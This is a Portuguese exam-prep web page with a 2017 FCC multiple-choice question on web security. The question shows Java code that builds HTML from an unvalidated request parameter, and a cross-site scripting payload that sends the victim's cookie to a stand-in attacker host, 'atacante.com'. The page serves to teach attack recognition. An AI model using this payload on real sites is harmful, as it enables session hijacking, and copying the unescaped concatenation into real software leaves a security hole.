Ícone Questionei
QuestõesDisciplinasBancasDashboardSimuladosCadernoRaio-XBlog
Logo Questionei

Links Úteis

  • Início
  • Questões
  • Disciplinas
  • Simulados

Legal

  • Termos de Uso
  • Termos de Adesão
  • Política de Privacidade

Disciplinas

  • Matemática
  • Informática
  • Português
  • Raciocínio Lógico
  • Direito Administrativo

Bancas

  • FGV
  • CESPE
  • VUNESP
  • FCC
  • CESGRANRIO

© 2026 Questionei. Todos os direitos reservados.

Feito com ❤️ para educação

/
/
/
/
/
/
'Isso causa o envio do ID de sessão da vítima para o site do atacante, permitindo que sequestre a sessão atual do usuário. Este é um cenário de ataque do tipo","text":"Considere um cenário em que uma aplicação utiliza dados não confiáveis na construção do seguinte fragmento HTML sem validação ou filtro: (String) page += \"\"; Considere, ainda, que um atacante modifica o parâmetro 'credit_card' em seu navegador para: '>'Isso causa o envio do ID de sessão da vítima para o site do atacante, permitindo que sequestre a sessão atual do usuário. Este é um cenário de ataque do tipo","answerCount":5,"datePublished":"2017-01-01T00:00:00-03:00","author":{"@type":"Organization","name":"FCC","url":"https://questionei.com"},"suggestedAnswer":[{"@type":"Answer","text":"Advanced Persistent Threat.","position":1,"encodingFormat":"text/html","upvoteCount":0,"datePublished":"2017-01-01T00:00:00-03:00","url":"https://questionei.com/questoes/457941201870573/#alternativa-0","author":{"url":"https://questionei.com","@type":"Organization","name":"FCC"}},{"@type":"Answer","text":"Buffer Overflow.","position":2,"encodingFormat":"text/html","upvoteCount":0,"datePublished":"2017-01-01T00:00:00-03:00","url":"https://questionei.com/questoes/457941201870573/#alternativa-1","author":{"url":"https://questionei.com","@type":"Organization","name":"FCC"}},{"@type":"Answer","text":"Session Persistent Hijacking.","position":3,"encodingFormat":"text/html","upvoteCount":0,"datePublished":"2017-01-01T00:00:00-03:00","url":"https://questionei.com/questoes/457941201870573/#alternativa-2","author":{"url":"https://questionei.com","@type":"Organization","name":"FCC"}},{"@type":"Answer","text":"Script-Fake Injection.","position":4,"encodingFormat":"text/html","upvoteCount":0,"datePublished":"2017-01-01T00:00:00-03:00","url":"https://questionei.com/questoes/457941201870573/#alternativa-3","author":{"url":"https://questionei.com","@type":"Organization","name":"FCC"}},{"@type":"Answer","text":"Cross-Site Scripting.","position":5,"encodingFormat":"text/html","upvoteCount":0,"datePublished":"2017-01-01T00:00:00-03:00","url":"https://questionei.com/questoes/457941201870573/#alternativa-4","author":{"url":"https://questionei.com","@type":"Organization","name":"FCC"}}]}}
  1. Início/
  2. Questões/
  3. Segurança da Informação e Criptografia/
  4. Questão 457941201870573

Considere um cenário em que uma aplicação utiliza dados não confiáveis na construção do seguinte fragmento HTML sem vali...

1

457941201870573
Ano: 2017Banca: FCCOrganização: TRT - 24ª REGIÃO (MS)Disciplina: Segurança da Informação e CriptografiaTemas: Cibersegurança

Considere um cenário em que uma aplicação utiliza dados não confiáveis na construção do seguinte fragmento HTML sem validação ou filtro:


(String) page += "<input name='num_cartao_credito' type='TEXT' value='" +

request.getParameter("credit_card") + " '>";


Considere, ainda, que um atacante modifica o parâmetro 'credit_card' em seu navegador para:


'><script>document.location= 'http://www.atacante.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>'


Isso causa o envio do ID de sessão da vítima para o site do atacante, permitindo que sequestre a sessão atual do usuário.


Este é um cenário de ataque do tipo

Gabarito comentado
Anotações
Marcar para revisão

Acelere sua aprovação com o Premium

  • Gabaritos comentados ilimitados
  • Caderno de erros inteligente
  • Raio-X da banca
Conhecer Premium

Questões relacionadas para praticar

Questão 457941200065733Segurança da Informação e Criptografia

O sistema criptográfico de chave pública RSA permite que o recebedor da mensagem, Roberto, crie suas chaves públicas e privadas. Para usar o RSA, Robe...

#Criptografia
Questão 457941200412070Segurança da Informação e Criptografia

Segundo a norma ISO 27001, para se estabelecer o Sistema de Gestão de Segurança da Informação (SGSI), considere: I. A organização deve definir uma pol...

#ISO/IEC 27001
Questão 457941200562690Segurança da Informação e Criptografia

Uma empresa montou uma filial e deseja estabelecer uma conexão segura de comunicação com ela, a custos razoáveis. Um Técnico dessa empresa propôs a cr...

#Criptografia#Rede Privada Virtual (VPN)
Questão 457941200626487Segurança da Informação e Criptografia

Os resultados da etapa de análise e avaliação de riscos permitem criar perfis de riscos dos programas, projetos e processos da organização, os quais N...

#Avaliação de Vulnerabilidades e Gerenciamento de Riscos
Questão 457941200626827Segurança da Informação e Criptografia

No que diz respeito a GPO (Group Policy Object) deve-se ter em mente a diretiva de grupo. Diretiva de grupo é um conjunto de regras que se pode utiliz...

#Medidas de Segurança
Questão 457941200755742Segurança da Informação e Criptografia

Um Tribunal Regional do Trabalho está implementando uma API RESTful para permitir que advogados acessem informações de processos judiciais de maneira ...

#Autenticação de Usuário
Questão 457941200834184Segurança da Informação e Criptografia

Considere as informações abaixo sobre tipos de ameaças. I. Falha de segurança no sistema operacional ou em aplicativos que permite o acesso ao computa...

#Ciberataques e Ameaças#Firewalls em Segurança da Informação
Questão 457941201075722Segurança da Informação e Criptografia

A seguinte notícia foi publicada na internet: “O malware atua capturando informações dos usuários. Criptografa os dados do dispositivo infectado e ped...

#Software Malicioso#Criptografia
Questão 457941201223109Segurança da Informação e Criptografia

Uma Política de Tratamento de Incidentes de Segurança da Informação deve conter um procedimento padronizado para o tratamento de incidentes que compre...

#Gestão de Segurança da Informação
Questão 457941202057494Segurança da Informação e Criptografia

Um plano de tratamento de riscos que identifique a ação de gestão apropriada, recursos, responsabilidades e prioridades para a gestão dos riscos de se...

#ISO/IEC 27001

Continue estudando

Mais questões de Segurança da Informação e CriptografiaQuestões sobre CibersegurançaQuestões do FCC